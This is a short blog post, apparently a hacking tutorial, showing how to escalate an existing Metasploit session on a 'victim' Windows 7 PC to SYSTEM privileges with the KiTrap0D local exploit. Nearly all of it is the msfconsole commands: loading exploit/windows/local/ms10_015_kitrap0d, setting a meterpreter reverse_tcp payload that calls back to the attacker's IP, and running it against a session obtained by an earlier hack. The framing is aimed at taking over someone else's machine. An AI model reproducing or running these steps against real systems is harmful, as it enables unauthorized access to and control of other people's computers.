Thứ Sáu, 6 tháng 12, 2013

Get Admin Privilege of Remote Victim PC using Windows SYSTEM Escalation via KiTrap0D

This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session is use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.

Exploit Targets

Windows 7

Requirement

Attacker: Kali Linux
Victim PC: Windows 7
First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)
Open Kali Linux terminal type msfconsole

Now type Now type use exploit/windows/local/ms10_015_kitrap0d
msf exploit (ms10_015_kitrap0d)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms10_015_kitrap0d)>set lhost 192.168.0.105 (IP of Local Host)
msf exploit (ms10_015_kitrap0d)>set session 1
msf exploit (ms10_015_kitrap0d)>exploit
Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

 

Không có nhận xét nào:

Đăng nhận xét